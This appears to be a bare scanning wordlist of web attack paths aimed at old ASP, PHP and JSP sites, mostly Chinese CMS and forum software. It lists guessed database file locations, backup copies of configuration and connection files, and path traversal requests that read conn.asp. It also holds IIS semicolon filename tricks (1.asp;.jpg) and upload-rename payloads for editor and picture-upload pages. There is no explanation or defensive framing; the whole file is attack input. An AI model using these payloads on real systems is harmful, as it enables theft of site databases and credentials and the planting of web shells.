###fdkjgzschool.V2009#.asp
%23%23%23fdkjgzschool.V2009%23.asp
%23hx66.net.mdb
%23TZIMS_Ver6.1.mdb
%23zxData.project%23.asp
%23zxData.project%23.mdb
..
../..
../admin.asp
../da%2fta/data.mdb
1.asp;.1.jpg
1.asp;.jpg
admin/1.asp;.1.jpg
admin/1.asp;.jpg
admin/admin_uploadfile.asp?id=14&dir=../..
admin/adnim.admin.asp
admin/Databackup/bak#wdf.mdb.mdb
admin/Databackup/bak%23wdf.mdb.mdb
admin/editor/admin_uploadfile.asp?id=14&dir=../..
admin/ewebeditor/admin_uploadfile.asp?id=14&dir=.
admin/uploadpic.asp?actiontype=mod&picname=1.asp
admin_config.aspx.bak
admin_config.php.bak
admin_data.aspx.bak
admin_data.jsp.bak
admin_data.php.bak
admin_uploadfile.asp?id=14&dir=../..
adnim.admin.asp
bbs/Data/%23dvbbs8.2.0.AC%23.asa
bbs/database/bbsxp.mdbblog/blogdata/L-BLOG.mdb
code.aspx.bak
code.jsp.bak
config.aspx.bak
config.jsp.bak
conn.aspx.bak
connection.aspx.bak
data%23aky8.mdb.asa
Data/#dvbbs7$$..##.mdb.ldb
data/%23%23DatalaoY2.4.mdb
data/%23%24%24%23www.izq.cn%23%24%23.mdb
data/%23aky8.mdb.asa
Data/%23dvbbs7$$..%23%23.mdb.ldb
Data/%23dvbbs7%24%24..%23%23.mdb.ldb
Data/%23dvbbs8.2.0.AC%23.asa
Data/12.3.mdb
Data/dvbbs8.2.0.AC%23.asa
data/Joekoe_CMS_4.0.mdb
Data/oblog%234.60.mdb
Data/SiteWeaver6.5.mdb
databackup/%24%25%40%232006-11-6www.edxsky.cn.dat
Databackup/bak#wdf.mdb.mdb
Databackup/bak%23wdf.mdb.mdb
databackup/www.edxsky.cn.data.mdb
DataBase/%23SX2008^.^.ASA
Data-base/db.net.asa
database/SiteWeaver6.5.mdb
databases/%23web.cn0797.cn.mdb
Databases/SiteWeaver6.5.mdb
databases/web.cn0797.cn.mdb
datas/%23ED-SC2.0#.mdb
datas/%23ED-SC2.0%23.mdb
datas/ED-SC2.0#.mdb
db_syhmw.net/syhmw%23db%23lear_site.asp
default2.jsp.bak
dfc1.0/addgbook.asp
down.asp?filename=../conn.asp
dtat/%23%23DatalaoY2.4.mdb
editor/admin_uploadfile.asp?id=14&dir=../..
flash/downfile.asp?url=uploadfile/../../conn.asp
Foosun_Data/FS400.mdbAdmin/login.asp
funciton.jsp.bak
inc.php.bak
inc/conn.asp.bak
inc/conn.asp.bk
index1.php.bak
Joekoe_CMS_4.0.mdb
manage/editor/admin_uploadfile.asp?id=14&dir=../.
oblog4.60.mdb
open.php.bak
PE2006/database/SiteWeaver6.5.mdb
select_soft.asp/include/dialoguser/select_media.
select_soft.asp/include/dialoguser/select_media.m
setup.aspx.bak
setup.php.bak
Site%23%23Weaver6.5.mdb
syscode.aspx.bak
syscode.jsp.bak
syscode.php.bak
test.aspx.bak
test.jsp.bak
test.php.bak
uploadpic.asp?actiontype=mod&picname=1.asp
uploadPic.asp?actionType=mod&picName=xuanran.asp
uploadPic.inc.asp
ViewFile.asp?FileName=../../../conn.asp
ViewFile.asp?FileName=../../../index.asp